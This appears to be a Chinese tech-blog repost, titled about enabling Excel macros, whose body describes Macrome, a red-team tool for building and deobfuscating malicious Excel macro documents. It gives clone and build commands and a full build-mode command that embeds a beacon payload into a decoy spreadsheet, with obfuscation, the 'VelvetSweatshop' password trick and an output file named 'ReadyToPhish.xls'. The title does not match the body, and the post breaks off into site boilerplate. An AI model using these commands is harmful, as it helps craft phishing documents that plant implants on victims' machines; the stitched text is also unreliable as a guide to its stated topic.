excel宏(excel宏被禁用如何启用)

九贤生活小编 电脑百科

前沿拓展:

excel宏(excel宏被禁用如何启用)

关于Macrome

Macrome是一款功能强大的Excel宏文档读取和编写工具,该工具专为红队研究人员和安全分析人员设计。

工具安装/构建

第一,我们需要使用下列命令将该项目源码克隆至本地:

git clone https://github.com/michaelweber/Macrome.git

接下来,我们就可以使用下列命令构建项目了:

dotnet run — build –decoy-document Docsdecoy_document.xls –payload Docspopcalc.bin

或者:

dotnet build

cd bin/Debug/netcoreapp2.0

dotnet Macrome.dll deobfuscate –path obfuscated_document.xls

需要注意的是,在进行代码构建时,我们需要在本地环境中安装并配置好dotnet 5.0+。【下载地址

不过,该工具的发布版本并不需要dotnet,我们可以直接访问该项目的【Releases页面】下载Windows、macOS或Linux系统的工具版本。

工具使用

我们可以直接在解决方案目录中运行“dotnet run”,或使用“dotnet”运行构建的Macrome代码。

Macrome主要有三种**作模式,即构建模式、导出模式和反混淆模式。

构建模式Macrome build –decoy-document decoy_document.xls –payload beacon.bin –payload64-bit beacon64.bin –payload-method Base64 –method ArgumentSubroutines –password VelvetSweatshop –preamble preamble.txt –output-file-name ReadyToPhish.xls

拓展知识:

原创文章,作者:九贤生活小编,如若转载,请注明出处:http://www.wangguangwei.com/13952.html

(0)
九贤生活小编九贤生活小编
0
上一篇 2023年 2月 6日 pm1:18
下一篇 2023年 2月 6日 pm1:24

相关推荐